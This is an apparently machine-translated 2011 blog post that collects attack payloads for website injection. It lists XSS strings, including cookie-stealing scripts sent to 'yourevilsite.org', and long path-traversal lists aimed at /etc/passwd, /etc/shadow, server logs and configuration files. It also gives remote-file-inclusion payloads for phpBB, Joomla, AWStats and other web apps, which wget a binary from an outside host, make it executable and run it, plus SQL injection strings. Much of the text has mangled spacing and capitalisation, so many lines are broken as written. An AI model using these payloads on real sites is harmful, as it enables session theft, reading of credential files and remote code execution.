Saturday 22 October 2011

Common ways possible XSS, SQL, PHP-inj ....


Sometimes it happens that we have a site that is vidm CSU, but do not know how to use injections, below I present the most

extended ones and not injection ...

XXS
</ Textarea> <script> alert (/ xss /) </ script>
</ Title> <script> alert (/ xss /) </ script>
<script src=http://yoursite.com/your_files.js> </ script>
"> <script> Alert (0) </ script>
<IMG SRC = javascript: Alert (String.fromCharCode (88,83,83))>
<IMG SRC=\"javascript:alert('XSS');\">
<IMG SRC=\"jav ascript:alert('XSS');\">
<IMG SRC=\"jav ascript:alert('XSS');\">
<marquee> <script> alert ('XSS') </ script> </ marquee>
<? echo ('<scr)';echo('ipt> alert (\ "XSS \") </ script>');?>
<style> @ im \ port '\ ja \ vasc \ ript: alert (\ "XSS \ ")';</ style>
<img src=foo.png onerror=alert(/xssed/) />
<script> alert (String.fromCharCode (88,83,83)) </ script>
<Scr <script> ipt> alert ('XSS');</ scr </ script> ipt>
<script>location.href="http://www.yourevilsite.org/cookiegrabber.php?cookie="+escape(document.cookie)</script>
<script src="http://www.yourevilsite.org/cookiegrabber.php"> </ script>
<script> alert ('XSS');</ script>
<script> alert (1); </ script>
<IMG LOWSRC = \ "javascript: Alert ('XSS') \ ">
<IMG DYNSRC = \ "javascript: Alert ('XSS') \ ">
<font style='color:expression(alert(document.cookie))'>
<Img src = "javascript: Alert ('XSS') ">
<script language="JavaScript"> alert ('XSS') </ script>


<Body onunload = "javascript: Alert ('XSS');">
<Body onLoad = "alert ('XSS');"
[Color = red 'onmouseover = "alert (' xss')"] mouse over [/ color]
"/></ A ></>< img src = 1.gif onerror = alert (1)>
window.alert ("Bonjour!");
<div style="x:expression((window.r==1)?'':eval('r=1;alert(String.fromCharCode(88,83,83));'))">
<Iframe <? Php echo chr (11)?> Onload = alert ('XSS')></ iframe>
"> <Script alert (String.fromCharCode (88,83,83)) </ script>
'>> <marquee> <h1> XSS </ h1> </ marquee>
'">>< Script> alert ('XSS') </ script>
'">>< Marquee> <h1> XSS </ h1> </ marquee>
<META HTTP-EQUIV = \ "refresh \" CONTENT = \ "0; url = javascript: Alert ('XSS'); \ ">
<META HTTP-EQUIV = \ "refresh \" CONTENT = \ "0; URL = http://; URL = javascript: Alert ('XSS'); \ ">
<script> var var = 1; alert (var) </ script>
<STYLE Type="text/css"> BODY {background: url ("javascript: Alert ('XSS')")}</ STYLE>

<?='< SCRIPT> alert ("XSS") </ SCRIPT> '?>
<IMG SRC = 'vbscript: Msgbox (\ "XSS \") '>
"Onfocus = alert (document.domain)"> <"
<FRAMESET> <FRAME SRC = \ "javascript: Alert ('XSS'); \ "> </ FRAMESET>
<STYLE> Li {list-style-image: url (\ "javascript: Alert ('XSS') \ ");}</ STYLE> <UL> <LI> XSS
perl-e 'print \ "<SCR\0IPT> alert (\" XSS \ ") </ SCR \ 0IPT> \";'> out
perl-e 'print \ "<IMG SRC=java\0script:alert(\"XSS\")> \";'> out
<br size=\"&{alert('XSS')}\">

/ Etc / passwd
/ Etc / shadow
/ Etc / group
/ Etc / security / group
/ Etc / security / passwd
/ Etc / security / user
/ Etc / security / environ
/ Etc / security / limits
/ Usr / lib / security / mkuser.default
.. / Apache / logs / access.log
.. / .. / Apache / logs / error.log
.. / .. / Apache / logs / access.log
.. / .. / .. / Apache / logs / error.log
.. / .. / .. / Apache / logs / access.log
.. / .. / .. / .. / .. / .. / .. / Etc / httpd / logs / acces_log
.. / .. / .. / .. / .. / .. / .. / Etc / httpd / logs / acces.log
.. / .. / .. / .. / .. / .. / .. / Etc / httpd / logs / error_log
.. / .. / .. / .. / .. / .. / .. / Etc / httpd / logs / error.log
.. / .. / .. / .. / .. / .. / .. / Var / www / logs / access_log
.. / .. / .. / .. / .. / .. / .. / Var / www / logs / access.log
.. / .. / .. / .. / .. / .. / .. / Usr / local / apache / logs / access_ log
.. / .. / .. / .. / .. / .. / .. / Usr / local / apache / logs / access. log
.. / .. / .. / .. / .. / .. / .. / Var / log / apache / access_log
../../../../../../../var/log/apache2/access_log
.. / .. / .. / .. / .. / .. / .. / Var / log / apache / access.log
../../../../../../../var/log/apache2/access.log
.. / .. / .. / .. / .. / .. / .. / Var / log / access_log
.. / .. / .. / .. / .. / .. / .. / Var / log / access.log
.. / .. / .. / .. / .. / .. / .. / Var / www / logs / error_log
.. / .. / .. / .. / .. / .. / .. / Var / www / logs / error.log
.. / .. / .. / .. / .. / .. / .. / Usr / local / apache / logs / error_l og
.. / .. / .. / .. / .. / .. / .. / Usr / local / apache / logs / error.l og
.. / .. / .. / .. / .. / .. / .. / Var / log / apache / error_log
../../../../../../../var/log/apache2/error_log
.. / .. / .. / .. / .. / .. / .. / Var / log / apache / error.log
../../../../../../../var/log/apache2/error.log
.. / .. / .. / .. / .. / .. / .. / Var / log / error_log
.. / .. / .. / .. / .. / .. / .. / Var / log / error.log

Apache


.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / httpd / access_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / httpd / error_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / httpd / access_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / httpd / error_log
.. / Apache / logs / error.log
.. / Apache / logs / access.log
.. / .. / Apache / logs / error.log
.. / .. / Apache / logs / access.log
.. / .. / .. / Apache / logs / error.log
.. / .. / .. / Apache / logs / access.log
.. / .. / .. / .. / Apache / logs / error.log
.. / .. / .. / .. / Apache / logs / access.log
.. / .. / .. / .. / .. / Apache / logs / error.log
.. / .. / .. / .. / .. / Apache / logs / access.log
../apache2/logs/error.log
../apache2/logs/access.log
../../apache2/logs/error.log
../../apache2/logs/access.log
../../../apache2/logs/error.log
../../../apache2/logs/access.log
../../../../apache2/logs/error.log
../../../../apache2/logs/access.log
../../../../../apache2/logs/error.log
../../../../../apache2/logs/access.log
.. / Logs / error.log
.. / Logs / access.log
.. / .. / Logs / error.log
.. / .. / Logs / access.log
.. / .. / .. / Logs / error.log
.. / .. / .. / Logs / access.log
.. / .. / .. / .. / Logs / error.log
.. / .. / .. / .. / Logs / access.log
.. / .. / .. / .. / .. / Logs / error.log
.. / .. / .. / .. / .. / Logs / access.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Etc / httpd / logs / acces_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Etc / httpd / logs / acces.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Etc / httpd / logs / error_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Etc / httpd / logs / error.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Usr / local / apache / logs / access_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Usr / local / apache / logs / access.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Usr / local / apache / logs / error_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Usr / local / apache / logs / error.log
../../../../../../../../../../usr/local/apache2/logs/access_log
../../../../../../../../../../usr/local/apache2/logs/access.log
../../../../../../../../../../usr/local/apache2/logs/error_log
../../../../../../../../../../usr/local/apache2/logs/error.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / www / logs / access_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / www / logs / access.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / www / logs / error_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / www / logs / error.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / httpd / access_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / httpd / access.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / httpd / error_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / httpd / error.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / apache / access_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / apache / access.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / apache / error_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / apache / error.log
../../../../../../../../../../var/log/apache2/access_log
../../../../../../../../../../var/log/apache2/access.log
../../../../../../../../../../var/log/apache2/error_log
../../../../../../../../../../var/log/apache2/error.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / access_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / access.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / error_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / error.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Opt / lampp / logs / access_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Opt / lampp / logs / error_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Opt / xampp / logs / access_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Opt / xampp / logs / error_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Opt / lampp / logs / access.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Opt / lampp / logs / error.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Opt / xampp / logs / access.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Opt / xampp / logs / error.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Program Files \ Apache Group \ Apache \ logs \ access.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Program Files \ Apache Group \ Apache \ logs \ error.log
.. / .. / .. / Apache / logs / error.log
.. / .. / .. / Apache / logs / access.log
.. / .. / .. / .. / Apache / logs / error.log
.. / .. / .. / .. / Apache / logs / access.log
.. / .. / .. / .. / .. / Apache / logs / error.log
.. / .. / .. / .. / .. / Apache / logs / access.log
.. / .. / .. / .. / .. / .. / Apache / logs / error.log
.. / .. / .. / .. / .. / .. / Apache / logs / access.log
.. / .. / .. / .. / .. / .. / .. / Apache / logs / error.log
.. / .. / .. / .. / .. / .. / .. / Apache / logs / access.log
.. / .. / .. / .. / .. / .. / .. / .. / Apache / logs / error.log
.. / .. / .. / .. / .. / .. / .. / .. / Apache / logs / access.log
.. / .. / .. / Logs / error.log
.. / .. / .. / Logs / access.log
.. / .. / .. / .. / Logs / error.log
.. / .. / .. / .. / Logs / access.log
.. / .. / .. / .. / .. / Logs / error.log
.. / .. / .. / .. / .. / Logs / access.log
.. / .. / .. / .. / .. / .. / Logs / error.log
.. / .. / .. / .. / .. / .. / Logs / access.log
.. / .. / .. / .. / .. / .. / .. / Logs / error.log
.. / .. / .. / .. / .. / .. / .. / Logs / access.log
.. / .. / .. / .. / .. / .. / .. / .. / Logs / error.log
.. / .. / .. / .. / .. / .. / .. / .. / Logs / access.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Etc / httpd / logs / acces_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Etc / httpd / logs / acces.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Etc / httpd / logs / error_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Etc / httpd / logs / error.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / www / logs / access_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / www / logs / access.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Usr / local / apache / logs / access_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Usr / local / apache / logs / access.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / apache / access_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / apache / access.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / access_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / www / logs / error_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / www / logs / error.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Usr / local / apache / logs / error_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Usr / local / apache / logs / error.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / apache / error_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / apache / error.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / access_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / error_log

conf


.. / .. / .. / .. / .. / .. / Usr / local / apache / conf / httpd.conf
../../../../../../usr/local/apache2/conf/httpd.conf
.. / .. / .. / .. / .. / .. / Etc / httpd / conf / httpd.conf
.. / .. / .. / .. / .. / .. / Etc / apache / conf / httpd.conf
.. / .. / .. / .. / .. / .. / Usr / local / etc / apache / conf / httpd.conf
../../../../../../etc/apache2/httpd.conf
.. / .. / .. / .. / .. / .. / .. / .. / .. / Usr / local / apache / conf / httpd.conf
../../../../../../../../../usr/local/apache2/conf/httpd.conf
.. / .. / .. / .. / .. / .. / .. / .. / Usr / local / apache / httpd.conf
../../../../../../../../usr/local/apache2/httpd.conf
.. / .. / .. / .. / .. / .. / .. / .. / Usr / local / httpd / conf / httpd.conf
.. / .. / .. / .. / .. / .. / .. / Usr / local / etc / apache / conf / httpd.conf
../../../../../../../usr/local/etc/apache2/conf/httpd.conf
.. / .. / .. / .. / .. / .. / .. / Usr / local / etc / httpd / conf / httpd.conf
../../../../../../../usr/apache2/conf/httpd.conf
.. / .. / .. / .. / .. / .. / .. / Usr / apache / conf / httpd.conf
../../../../../../../usr/local/apps/apache2/conf/httpd.conf
.. / .. / .. / .. / .. / .. / .. / Usr / local / apps / apache / conf / httpd.conf
.. / .. / .. / .. / .. / .. / Etc / apache / conf / httpd.conf
../../../../../../etc/apache2/conf/httpd.conf
.. / .. / .. / .. / .. / .. / Etc / httpd / conf / httpd.conf
.. / .. / .. / .. / .. / .. / Etc / http / conf / httpd.conf
../../../../../../etc/apache2/httpd.conf
.. / .. / .. / .. / .. / .. / Etc / httpd / httpd.conf
.. / .. / .. / .. / .. / .. / Etc / http / httpd.conf
.. / .. / .. / .. / .. / .. / Etc / httpd.conf
.. / .. / .. / .. / .. / Opt / apache / conf / httpd.conf
../../../../../opt/apache2/conf/httpd.conf
.. / .. / .. / .. / Var / www / conf / httpd.conf
.. / .. / .. / Private / etc / httpd / httpd.conf
.. / .. / .. / Private / etc / httpd / httpd.conf.default
../../Volumes/webBackup/opt/apache2/conf/httpd.conf
.. / .. / Volumes / webBackup / private / etc / httpd / httpd.conf
.. / .. / Volumes / webBackup / private / etc / httpd / httpd.conf.default
.. / .. / .. / .. / .. / .. / .. / .. / .. / Program Files \ Apache Group \ Apache \ conf \ httpd.conf
.. / .. / .. / .. / .. / .. / .. / .. / .. / Program Files \ Apache Group \ Apache2 \ conf \ httpd.conf
.. / .. / .. / .. / .. / .. / .. / .. / .. / Program Files \ xampp \ apache \ conf \ httpd.conf
.. / .. / .. / .. / .. / .. / .. / .. / .. / Usr / local / php / httpd.conf.php
../../../../../../../../../usr/local/php4/httpd.conf.php
../../../../../../../../../usr/local/php5/httpd.conf.php
.. / .. / .. / .. / .. / .. / .. / .. / .. / Usr / local / php / httpd.conf
../../../../../../../../../usr/local/php4/httpd.conf
../../../../../../../../../usr/local/php5/httpd.conf
../../../../../../../../../Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf
../../../../../../../../../Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf
../../../../../../../../../Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf
../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php
../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php
../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php
/ Usr / local / etc / apache / vhosts.conf

php.ini


.. / .. / .. / .. / .. / .. / .. / .. / .. / Etc / php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / Bin / php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / Etc / httpd / php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / Usr / lib / php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / Usr / lib / php / php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / Usr / local / etc / php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / Usr / local / lib / php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / Usr / local / php / lib / php.ini
../../../../../../../../../usr/local/php4/lib/php.ini
../../../../../../../../../usr/local/php5/lib/php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / Usr / local / apache / conf / php.ini
../../../../../../../../../etc/php4.4/fcgi/php.ini
../../../../../../../../../etc/php4/apache/php.ini
../../../../../../../../../etc/php4/apache2/php.ini
../../../../../../../../../etc/php5/apache/php.ini
../../../../../../../../../etc/php5/apache2/php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / Etc / php / php.ini
../../../../../../../../../etc/php/php4/php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / Etc / php / apache / php.ini
../../../../../../../../../etc/php/apache2/php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / Web / conf / php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / Usr / local / Zend / etc / php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / Opt / xampp / etc / php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / Var / local / www / conf / php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / Etc / php / cgi / php.ini
../../../../../../../../../etc/php4/cgi/php.ini
../../../../../../../../../etc/php5/cgi/php.ini
../../../../../../../../../php5 \ php.ini
../../../../../../../../../php4 \ php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / Php \ php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / PHP \ php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / WINDOWS \ php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / WINNT \ php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / Apache \ php \ php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / Xampp \ apache \ bin \ php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / NetServer \ bin \ stable \ apache \ php.ini
../../../../../../../../../home2 \ bin \ stable \ apache \ php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / Home \ bin \ stable \ apache \ php.ini
../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php/lib/php.ini

CPanel:
* log


/ Usr / local / cpanel / logs
/ Usr / local / cpanel / logs / stats_log
/ Usr / local / cpanel / logs / access_log
/ Usr / local / cpanel / logs / error_log
/ Usr / local / cpanel / logs / license_log
/ Usr / local / cpanel / logs / login_log
/ Usr / local / cpanel / logs / stats_log
* Conf
/ Var / cpanel / cpanel.config


MySQL:
* log


/ Var / log / mysql / mysql-bin.log
/ Var / log / mysql.log
/ Var / log / mysqlderror.log
/ Var / log / mysql / mysql.log
/ Var / log / mysql / mysql-slow.log
/ Var / mysql.log
* Conf
/ Var / lib / mysql / my.cnf
/ Etc / mysql / my.cnf
/ Etc / my.cnf

MySQL (Windows):
+ log conf

C: \ Program Files \ MySQL \ MySQL Server 5.0 \ data \ hostname.err
C: \ Program Files \ MySQL \ MySQL Server 5.0 \ data \ mysql.log
C: \ Program Files \ MySQL \ MySQL Server 5.0 \ data \ mysql.err
C: \ Program Files \ MySQL \ MySQL Server 5.0 \ data \ mysql-bin.log
C: \ Program Files \ MySQL \ data \ hostname.err
C: \ Program Files \ MySQL \ data \ mysql.log
C: \ Program Files \ MySQL \ data \ mysql.err
C: \ Program Files \ MySQL \ data \ mysql-bin.log
C: \ MySQL \ data \ hostname.err
C: \ MySQL \ data \ mysql.log
C: \ MySQL \ data \ mysql.err
C: \ MySQL \ data \ mysql-bin.log
C: \ Program Files \ MySQL \ MySQL Server 5.0 \ my.ini
C: \ Program Files \ MySQL \ MySQL Server 5.0 \ my.cnf
C: \ Program Files \ MySQL \ my.ini
C: \ Program Files \ MySQL \ my.cnf
C: \ MySQL \ my.ini
C: \ MySQL \ my.cnf

FTP


ProFTPD:
* Log
/ Etc / logrotate.d / proftpd
/ Www / logs / proftpd.system.log
/ Var / log / proftpd
* Conf
/ Etc / proftp.conf
/ Etc / protpd / proftpd.conf
/ Etc/vhcs2/proftpd/proftpd.conf
/ Etc / proftpd / modules.conf

vsftpd:
* Log
/ Var / log / vsftpd.log
/ Etc / vsftpd.chroot_list
/ Etc / logrotate.d / vsftpd.log
* Conf
/ Etc / vsftpd / vsftpd.conf
/ Etc / vsftpd.conf
/ Etc / chrootUsers

wu-ftpd:
* Log
/ Var / log / xferlog
/ Var / adm / log / xferlog
* Conf
/ Etc / wu-ftpd / ftpaccess
/ Etc / wu-ftpd / ftphosts
/ Etc / wu-ftpd / ftpusers

Pure-FTPd:
* Conf
/ Usr / sbin / pure-config.pl
/ Usr / etc / pure-ftpd.conf
/ Etc / pure-ftpd / pure-ftpd.conf
/ Usr / local / etc / pure-ftpd.conf
/ Usr / local / etc / pureftpd.pdb
/ Usr / local / pureftpd / etc / pureftpd.pdb
/ Usr / local / pureftpd / sbin / pure-config.pl
/ Usr / local / pureftpd / etc / pure-ftpd.conf
-/etc/pure-ftpd.conf
/ Etc / pure-ftpd / pure-ftpd.pdb
/ Etc / pureftpd.pdb
/ Etc / pureftpd.passwd
/ Etc / pure-ftpd / pureftpd.pdb
DragonflyBSD & FreeBSD: / usr / ports / ftp / pure-ftpd /
OpenBSD: / usr / ports / net / pure-ftpd /
NetBSD: / usr / pkgsrc / net / pureftpd /
Crux Linux: / usr / ports / contrib / pure-ftpd /
* Log
/ Var / log / pure-ftpd / pure-ftpd.log
/ Logs / pure-ftpd.log
/ Var / log / pureftpd.log

Other:
/ Var / log / ftp-proxy / ftp-proxy.log
/ Var / log / ftp-proxy
/ Var / log / ftplog
/ Etc / logrotate.d / ftp
/ Etc / ftpchroot
/ Etc / ftphosts

Mail Server


/ Var / log / exim_mainlog
/ Var / log / exim / mainlog
/ Var / log / maillog
/ Var / log / exim_paniclog
/ Var / log / exim / paniclog
/ Var / log / exim / rejectlog
/ Var / log / exim_rejectlog


PHPMyAdmin

Target
PHPMyAdmin
Files Requested
/ PMA / main.php
/ Admin / main.php
/ Admin / mysql / main.php
/ Admin / phpmyadmin / main.php
/ Admin / pma / main.php
/ Db / main.php
/ Dbadmin / main.php
/ Main.php
/ Myadmin / main.php
/ Mysql-admin/main.php
/ Mysql / main.php
/ Mysqladmin / main.php
/ PhpMyAdmin-2.2.3/main.php
/ PhpMyAdmin-2.2.6/main.php
/ PhpMyAdmin-2.5.1/main.php
/ PhpMyAdmin-2.5.4/main.php
/ PhpMyAdmin-2.5.6/main.php
/ Phpmyadmin / main.php
/ Phpmyadmin2/main.php
/ Web / phpMyAdmin / main.php
/ PMA / read_dump.php
/ Db / read_dump.php
/ Dbadmin / read_dump.phpv / myadmin / read_dump.php
/ Mysql / read_dump.php
/ Mysqladmin / read_dump.php
/ PhpMyAdmin% 202.6.4-pl4/read_dump.php
/ PhpMyAdmin% 202.7.0-beta1/read_dump.php
/ PhpMyAdmin% 202.7.0-pl1/read_dump.php
/ PhpMyAdmin% 202.7.0-rc1/read_dump.php
/ PhpMyAdmin% 202.7.0/read_dump.php
/ PhpMyAdmin-2.2.3/read_dump.php
/ PhpMyAdmin-2.2.7-pl1/read_dump.php
/ PhpMyAdmin-2.5.6/read_dump.php
/ PhpMyAdmin-2.5.7-pl1/read_dump.php
/ PhpMyAdmin-2.6.0-pl3/read_dump.php
/ PhpMyAdmin-2.6.0/read_dump.php
/ PhpMyAdmin-2.6.1-pl3/read_dump.php
/ PhpMyAdmin-2.6.3-pl1/read_dump.php
/ PhpMyAdmin-2.6.4/read_dump.php
/ Phpadmin / read_dump.php
/ Phpmyadmin / read_dump.php
/ Phpmyadmin1/read_dump.php
/ Phpmyadmin2/read_dump.php
/ Typo3/phpmyadmin/read_dump.php
/ Web / phpMyAdmin / read_dump.php
/ Xampp / phpmyadmin / read_dump.php

Some PHP scripts

/ DE/index2.php
/ FR/index2.php
/ NL/index2.php
/ US/index2.php
/ Cms / index.php
/ Cms/index2.php
/ Cvs / index.php
/ Cvs/index2.php
/ Index.php
/ Index2.php
/ Mambo / index.php
/ Mambo/index2.php
/ Mb / index.php
/ Mb/index2.php
/ Site/index2.php
/ V1/index2.php
/ V2/index2.php
/ V3/index2.php

phpBB

/ Modules / Forums / admin / admin_styles.php
/ Forums / admin / admin_styles.php
/ Includes / functions.php
/ Includes / functions_nomoketos_rules.php
/ Modules / Forums / admin / admin_mass_email.php
/ Modules / Forums / admin / index.php
phpbb_root_path = http://XXX.XXX.XX.XX/cmd.dat?
cmd = cd% 20/tmp; wget% 20XXX.XXX.XX.XX/cbac; chmod% 20 744% 20cbac;. / cbac; echo% 20YYY; echo |

Coppermine


Target
Coppermine
Files Requested
/ Modules / coppermine / themes / default / theme.php
Payload
THEME_DIR = http://XXX.XXX.XX.XX/cmd.gif?
cmd = cd% 20/tmp; wget% 20XXX.XXX.XX.XX/cbac; chmod% 20 744% 20cbac;. / cbac; echo% 20YYY; echo |

Mambo / Joomla Content Management System
/ Index.php
/ Index2.php
/ Mambo/index2.php
/ Cvs/index2.php
/ Cvs/mambo/index2.php
/ Php/mambo/index2.php
/ Cbcms / mod_cbsms_messages.php
/ Components / com_extcalendar / admin_events.php
/ Components / com_forum / download.php
/ Components / com_galleria / galleria.html.php
/ Components / com_hashcash / server.php
/ Components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php
/ Components / com_loudmounth / includes / abbc / abbc.class.php
/ Components / com_pcchess / include.pcchess.php
/ Components / com_pccookbook / pccookbook.php
/ Components / com_performs / performs.php
/ Components / com_pollxt / conf.pollxt.php
/ Components/com_rsgallery2/rsgallery.html.php
/ Components / com_smf / smf.php
/ Components / com_simpleboard / file_upload.php
/ Components / com_sitemap / sitemap.xml.php
/ Components / com_videodb / core / videodb.class.xml.php
/ Mod_cbsms_messages.php
Payload
_REQUEST [Option] = com_content
_REQUEST [Itemid] = 1
GLOBALS =
mosConfig_absolute_path = http://XXX.XXX.XX.XX/cmd.gif?
cmd = cd% 20/tmp; wget% 20XXX.XXX.XX.XX/micu; chmod% 20 744% 20micu;. / micu; echo% 20YYY; echo |
CONFIG_EXT [LANGUAGES_DIR] = http://XXX.XXX.XXX/components/com_extcalendar/upload/Thehacker?&cmd=id
phpbb_root_path = http://XXX.XXX.XXX/components/com_extcalendar/upload/Thehacker?&cmd=id

Wordpress, Drupal and others ...

/ Blog / xmlrpc.php
/ Blog / xmlsrv / xmlrpc.php
/ Blogs / xmlsrv / xmlrpc.php
/ Drupal / xmlrpc.php
/ Phpgroupware / xmlrpc.php
/ Wordpress / xmlrpc.php
/ Xmlrpc.php
/ Xmlrpc / xmlrpc.php
/ Xmlsrv / xmlrpc.php

AWStats

/ Awstats / awstats.pl
/ Cgi-bin/awstats.pl
/ Cgi-bin/awstats/awstats.pl
Payload
configdir = | echo; echo% 20YYY; cd% 20% 2ftmp% 3bwget% 20XX X% 2eXXX% 2eXX% 2eXX% 2fmirela% 3bchmod% 20% 2bx% 20mirela%

3b% 2e% 2fmirela; echo% 20YYY; echo |
Microsoft Applications / Extensions
Code:
/ 5c/_vti_bin/owssvr.dll
/ 5c/MSOffice/cltreq.asp
Payload
UL = 1 & ACT = 4 & BUILD = 6551 & STRMVER = 4 & CAPREQ = 0

DBImageGallery


/ Admin / attributes.php
/ Admin / images.php
/ Admin / scan.php
/ Includes / attributes.php
/ Includes / db_utils.php
/ Includes / images.php
/ Includes / utils.php
/ Includes / values.php
Payload
donsimg_base_path = http://XXX.XXX.XX.XXX/ ~ lisir / M.txt? & /

DBGuestbook

/ Includes / guestbook.php
/ Includes / utils.php
/ Includes / views.php
Payload
dbs_base_path = http://XXX.XXX.XX.XXX/ ~ lisir / M.txt? & /
Ultimate Fun Book
Code:
/ Board / / function.php
/ Funboard / function.php
/ Function.php
Payload
gbpfad = http://XXX.XXX.XX.XXX/ ~ lisir / M.txt? & /


Sinapis Forum CMS

/ Sinapis.php
/ Forum / / sinapis.php
/ FO / sinapis.php
Payload
fuss = http://XXX.XXX.XX.XXX/ ~ lisir / M.txt? & /

Admin Phorum

PhpForums Admin Phorum
Files Requested
/ Actions / del.php
Payload
include_path = http://XXX.XXX.XX.XXX/ ~ lisir / M.txt? & /
PMB Services
Code:
/ Cnl_prod / pmb / opac_css / includes / resa_func.inc.php
/ Pmb / opac_css / includes / resa_func.inc.php
/ Opac_css / includes / resa_func.inc.php
Payload
class_path = http://XXX.XXX.XX.XXX/ ~ lisir / M.txt? & /
PHP-MIP
Code:
/ Php / top.php
/ Phpmip / / top.php
/ Top.php
Payload
laypath = http://XXX.XXX.XX.XXX/ ~ lisir / M.txt? & /

SendStudio

Files Requested
/ Sendstudio / admin / includes / createemails.inc.php
/ Sendstudio / admin / includes / send_emails.inc.php
Payload
ROOTDIR = http://XXX.XXX.XX.XXX/ ~ lisir / M.txt? & /
 


SQL

'
"
#
-
-
'-
- ';
';
= '
=;
= -
\ X23
\ X27
\ X3D \ x3B '
\ X3D \ x27
\ X27 \ x4F \ x52 SELECT *
\ X27 \ x6F \ x72 SELECT *
'Or select *
admin' -
'; Shutdown -
<>"'%;)(&+
'Or''='
'Or' x '=' x
"Or" x "=" x
') Or (' x '=' x
0 or 1 = 1
'Or 0 = 0 -
